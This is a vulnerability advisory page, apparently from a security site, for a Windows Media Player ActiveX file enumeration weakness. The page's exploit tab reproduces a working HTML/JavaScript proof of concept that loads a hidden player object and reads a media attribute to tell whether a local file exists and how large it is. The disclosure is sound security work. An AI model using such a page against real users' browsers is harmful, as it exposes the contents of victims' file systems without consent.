• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Windows Media Player ActiveX Control File Enumeration Weakness

The following exploit was provided:

<html><head><title>My Mortality</title></head><body>

<H1>Look at yourself and find the mortality of your body</H1>
<object style="display:none;"
classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
id="WindowsMediaPlayer">
<param name="autoStart" value="0">
<param name="mute" value="1">
</object>

<script>
var filePath = prompt("Enter the path of local file to check:","c:\\test.txt");
WindowsMediaPlayer.URL=filePath;
setTimeout(
function(){
ss=WindowsMediaPlayer.currentMedia.getItemInfoByAtom(19);
if (ss!="")
alert(filePath+" exist.\nThe file size is "+ss+" bytes. And you are surely vulnerable");
else
alert(filePath+" does not exist. Or you are not vulnerable");
}
,100);
</script>

</body></html>